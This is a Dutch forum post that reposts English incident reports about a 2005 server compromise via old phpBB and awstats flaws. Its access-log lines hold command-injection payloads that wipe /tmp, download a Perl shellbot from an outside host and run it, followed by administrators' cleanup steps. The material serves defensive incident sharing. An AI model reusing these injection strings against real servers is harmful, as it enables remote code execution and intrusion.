phpBB zo snel mogelijk upgraden als je een oude versie gebruikt!
Oude phpBB's zijn gevoelig voor een perl exploit waardoor er een IRC kanaal gecreërd wordt.
Hier in het engels wat ik in enkele andere forums heb gepost:
Code:
One of our servers was attacked today with a Perl/Shelbot.
This is what I retrieved from the http acces log:
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET ///awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET //cgi-bin/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Code:
this loaded an apache service on port 443 with the root user.
And a huge apache mod_perl usage of resorces by that
I restarted the httpd server and got this message:
(98)Address already in use: make_sock: could not bind to address [::]:443
I did a ps -auxf and saw that there where 2 apache processes running as root
Then:
#fuser 443/tcp
443/tcp: xxxx yyyy zzzz <- proceses using 443
#kill -9 xxxx yyyy xxxx
#service httpd start
And everything worked fine again.
Code:
I see that this was also downloaded: http://uyx.lithyum.org/sess_
This is what I found many times in the http error log:
--19:46:20-- http://uyx.lithyum.org/sess_
=> `sess_'
Resolving uyx.lithyum.org... 69.57.134.47
Connecting to uyx.lithyum.org|69.57.134.47|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,334 (27K) [text/plain]
0K .......... .......... ...... 100% 45.45 KB/s
19:46:21 (45.45 KB/s) - `sess_' saved [27334/27334]
Code:
Well after looking, we do not even have awstats, so it's realy wierd.
The guys on this forum have the same problem, also no awstats:
http://forum.dshield.org/read.php?3,...2243#msg-22243
By the way, I'm running CentOS 4.1, Ensim 4.0.4 and was running php 4.3.9, updated it now to 4.4.0 with the rpms from Cheetahweb, but still there was an attack there.
Now I chmoded wget 600 and located the site which was atacked on the server, disabeled mod_perl and CGI, blokked some IP's, it seems to have solved the vurnability, but I'm not sure.
Code:
Hi,
I found this thread while doing a postmortem of the break-in by this UYX dude. My case is similar: unpatched phpBB allowed the upload of arbitrary files,
gaining this dude access to the system by using the phpBB highlight Exploit
(discussed in several places in the phpBB community forums).
Incidentaly, I got to interact with him, on the #uruguay channel of the irc.com.ve server (that evidently has also been compromised).
The guy boasts that he controls many machines using IRC zombies that routinely search for vulnerable systems,
and that I should behave nicely, otherwise he'd "rm -rf /" my server.
The guy is spanish speaking, and certainly he uses uruguayan modisms.
At the irc.com.ve's #uruguay IRC channel,
you can a URL displayed as the MOTD: k4boom.biz/tools,
which contains several tools for system intrusion. Anyway.... it looks like UYX wants to install IRC daemons to increase his....
I don't know what he wants to accomplish.
In my case, I did this:
- temporarily remove support for PHP on the system
- Kill the IRC daemon
- As I was getting tons of requests from several IRC zombies, I closed port 6667.
- Delete the files that were left all over the machine:
/var/local/.0 This directory contained the IRC sources
/usr/bin/http The IRC daemon
/sbin/ttyload and /sbin/ttymon, a couple of daemons at first running on port 1, later on what seemed to be random ports, that were used to monitor activity in my system and execute commands remotely as root
/bin/ls /bin/ps /sbin/ifconfig /sbin/ps and several others, that I identified in two ways: The files were protected (see the chattr man page) with the attributes "i", "a" and "s". Most of these files where owned by uid 122, gid 144
- Ran rkhunter, which identified two rootkits: SHV4 and SHV5, and several additional compromised files in the system.
- Reloaded the system with safe files.
- In my case, I did not have to patch phpBB, as my users don't use it, I just got rid of it, but I'm sure others will not have this luxury.
- Restored PHP
Hope this helps.
Code:
I see that I haven't mentioned one thing...
Since I have apf running on the server, there are only a few inbound and outbound ports allowed.
What this Shellbot did was using port 443 (https) and when apache came down (or when "it" managed to stop the httpd service) it took this port for the Shellbot.
I ran rkhunter, no problems (well I was on the server when the atack took place so I could take action while the attack took place).
I haven't got any attacks since 10-17-2005, after the measurements that I took.
Probleem is hiermee opgelost, ik hoop dat je er wat aan hebt!